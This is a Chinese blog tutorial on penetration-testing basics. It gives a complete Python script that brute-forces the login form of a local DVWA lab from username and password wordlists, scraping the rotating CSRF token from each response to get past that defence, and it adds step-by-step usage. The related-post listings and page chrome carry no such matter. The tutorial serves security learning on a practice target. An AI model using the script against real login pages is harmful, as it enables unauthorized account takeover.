渗透测试入门学习——使用python脚本自动跟踪csrf_token实现对网站登录界面的暴力破解

已于 2024-10-04 20:55:05 修改
阅读量176 收藏 1
点赞数 2
文章标签: csrf 前端 python web安全 安全 php 网络安全
于 2024-10-04 20:54:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44611153/article/details/142705996
版权

目录

写在前面

使用方法

相关代码

写在前面

最近在学习使用Burp Suite时发现其intruder模块无法实现多种模式的混合使用,就如想要暴力破解账号和口令两个区域并同时跟踪网页的csrf_token时BP似乎不能很方便的实现这一功能,于是自己在练习时就想到了用python脚本的方式来弥补BP中的这一欠缺,其中的核心便是用python中的正则匹配库实现对Response内容的分析和定位需要获取的内容

相关代码

import requests
import re

# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=high; PHPSESSID=ekjn7547iglbc0stpsef2m9gm3"
# 填入页面中下次一请求需要携带的csrf_token值
csrf_token = "99095598fea3cf9d615b2687747aaf5f"
bf_flag = False
# success为未知,但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"
count = 0
# 定义正则表达式匹配规则,匹配某个input标签中name为user_token的字段的value值
# <input[^>]匹配以<input开始到>字符串
# 正则表达式的规则中+号后面的规则会继续对加号前面所匹配到字符串做处理,相当于层层筛选
# name=["\']user_token["\']匹配name="user_token"或name='user_token'字符串
# [^>]+value=["\']在input标签中,找到属性value=
# ([^"\']+)用来获取到匹配到的value中属性的值
# [^"\']+匹配非引号的字符
model = r'<input[^>]+name=["\']user_token["\'][^>]+value=["\']([^"\']+)["\']'

with open("./user.txt", 'r') as file_usr:
    with open("./pswd.txt", 'r') as file_pwd:
        while not bf_flag:
            first = file_usr.readline()
            if not first:
                break
            # 在内层循环之前,重置文件指针到文件开头实现遍历
            file_pwd.seek(0)
            while not bf_flag:
                second = file_pwd.readline()
                if not second:
                    break
                first = first.strip()
                second = second.strip()
                count += 1
                response = requests.get(url = url,
                                        params = {"username":first, "password":second, "Login":"Login", "user_token":csrf_token},
                                        headers = {"Cookie":cookie})
                match = re.search(model, response.text)
                if match:
                    # 获取正则表达式匹配到的内容,这里正常情况下只会匹配到一个,用.group(1)即可
                    csrf_token = match.group(1)
                else:
                    print("获取token失败,请检查匹配规则")
                if failure in response.text:
                    print("第"+ str(count) +"次尝试--失败:",first + " " + second)
                else:
                    print("第"+ str(count) +"次尝试--成功:",first + " " + second)
                    bf_flag = True;
                    break;

使用方法

在登陆界面随意尝试,查看并复制请求头中的Cookie值

在页面元素中查找下一次向服务器请求所需要的csrf_token值 

填写到脚本的对应位置

根据自己的情况分别引入账号、口令两个字典文件

 运行代码等待破解成功

Dovir多多
关注
渗透测试入门学习——Burp Suite暴力破解Intruder各种攻击模式的使用总结:Grep - Match添加特征字、自动跟踪csrf_token实现暴力破解
qq_44611153的博客
10-02 291
PS:在不知道用户名也不知道口令时bp工具实现对双区域爆破并跟踪csrf_token实现有些困难,后续会再单独写一篇博客用Python脚本实现此功能,或是对于某些输入用户名正确有特征字提示的网站(如输入不存在的账号时提示“用户名不存在”,输入存在的账号时提示“密码输入错误”)可以先暴力破解用户名,再暴力破解密码口令。点击Refetch response获取一个包,搜索关键字,鼠标拖动选中需要定位的内容,注意要将此token复制保存,后续要填写到递归匹配的首次请求参数中去,是递归匹配的入口。
python csrf token cookie_{% csrf_token %} 原理和作用 (踩坑必看)
weixin_32412379的博客
03-01 898
简介在django中我们需要在templates的form中加入{%csrf_token%}这串内容,它的作用是当我们get表单页面时,服务器返回页面的同时也会向前端返回一串随机字符,post提交时服务器会验证这串字符来确保用户是在服务端返回的表单页面中提交的数据,防止有人通过例如jquery脚本向某个url不断提交数据,是一种数据提交的验证机制。用途跨站点请求伪造(CSRF)保护CSRF攻击允许...
Python如何获取csrf_token
weixin_41548578的博客
11-27 4503
前言 突然接到一个任务,将Jenkins与我们的自动化测试平台集成进来,自动化平台时基于python+django的。这就需要写一个python脚本去调用平台的runsuite接口,由Jenkins去触发。 通过Charles抓取到相应的接口后执行起来一直报403,调查后发现是由于Django平台设置的csrf_token一直在变化. 解决办法 用postman运行接口时,可以在postman的T...
python csrf token_使用python请求和csrftoken登录
weixin_39875805的博客
12-08 512
我正在使用python的requests模块尝试登录一个网页。我打开一个请求.会话(),然后我得到cookie和包含在meta标记中的csrf令牌。我使用用户名、密码、一个隐藏的输入字段和meta标记中的csrf令牌来构建我的有效负载。之后,我使用post方法并传递登录url、cookie、有效负载和头。但是在那之后,我就不能访问登录页面后面的页面了。我做错什么了?在这是我执行登录时的请求头:Re...
python csrf token_Pythoncsrftoken的问题
weixin_29331689的博客
02-09 538
我试图创建一个脚本自动登录到earthdata站点,因为我想从那里下载文件,但是我很难找到csrf_令牌的正确名称。当我运行下面的脚本时,它总是给我以下错误:KeyError:“name='authenticity_token',domain=None,path=None”有人知道我怎么找到正确的名字吗,或者我在这里做了其他错事?谢谢import requestsfrom requests im...
python csrf token_python爬虫如何获取X-CSRF-Token
weixin_39957647的博客
12-08 2176
headers3 = {"Accept": "application/json, text/javascript, */*; q=0.01","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Connection":...
python csrf token_在django中使用post方法时,需要增加csrftoken的例子
weixin_39878247的博客
12-08 307
从百度查到在django中,使用post方法时,需要先生成随机码,以防止CSRF(Cross-site request forgery)跨站请求伪造,并稍加修改:注:这是一个js文件,需要引入到html模板中:这样做比使用{% csrf_token %}方便$(function () {$.ajaxSetup({headers: { "X-CSRFToken": getCookie("csrfto...
python csrf token cookie_使用Python请求访问时,网站未设置csrftoken cookie
weixin_36473057的博客
03-01 308
我正在尝试使用该requests库登录站点,但它通常无法正常工作。我希望该网站像通过浏览器访问时一样发送一个cookie:csrftoken: Bl5DOVcUge5VeRv771nAIUNbxmm9Z9l2但是,我收到的只是以下内容:__cfduid: d2f8e300a0b867e8a6147462f3977f8b11375815648197 for .example2.net/这是我期望的:...
python csrf token_使用Python CGIHTTPServer绕过注入时的CSRF Token防御
weixin_39892019的博客
12-08 256
前言CSRF tokens是服务器生成的一串随机值,其主要作用是防止表单重复提交以及请求伪造攻击。由于该生成值具有随机性,一次性,并且是基于服务器端的前一个请求生成的,因此黑客几乎不可能伪造它。Burp Suite虽说无法伪造,但并不代表我们就不能绕过它。这里,不得不提及一款web渗透神器Burp Suite。在Burp上有多种配置其使用宏来绕过HTML表单上CSRF tokens的方法,例如我们...
python毕业设计之nweb渗透测试工具(django)源码.zip
07-14
学习这个项目时,你需要掌握Python基础知识、Django框架的使用Web安全理论和渗透测试技术。通过阅读源码,你可以深入理解Django的工作原理,同时提升自己的安全意识和编程技能。务必注意,渗透测试应仅用于合法...
python自动化测试脚本的简单实例_Python 3.7 + Selenium UI 自动化测试简单实例
weixin_39942318的博客
11-24 1098
本篇主要应用Django搭建学生管理平台,使用Python + Selenium 模拟用户注册登录场景简单实例。Django实战部分往后可能和大家见面,目前还在学习,对于一些异常处理和业务模型还在摸索。Django学生管理平台仓库地址:https://github.com/A-HUAN/Django-courseSelectionSystem实际项目中用python脚本简单实现UI测试的步骤:1....
使用Python实现B站自动答题
吴秋霖的博客
08-19 1232
使用Python写了一个自动答题机器人!基于接口协议实现且包含点选验证码识别
Pikachu-csrf-CSRF(POST)
guanrongl的专栏
10-03 138
拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC。打开 poc.html 页面,点击submit request ,即可达成攻击;得到以下 html 代码 ,生成poc.html 文件,当用户点击。
Pikachu-csrf-CSRF(get)
guanrongl的专栏
10-03 197
就是 get请求的csrf 攻击payload。登陆,修改个人信息;发现这是个get请求。
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1017
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
Vue根实例、实例总结
最新发布
m0_54007573的博客
10-04 318
Vue根实例、实例总结
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 566
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
登录功能开发 P167重点
2303_81204446的博客
09-30 348
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值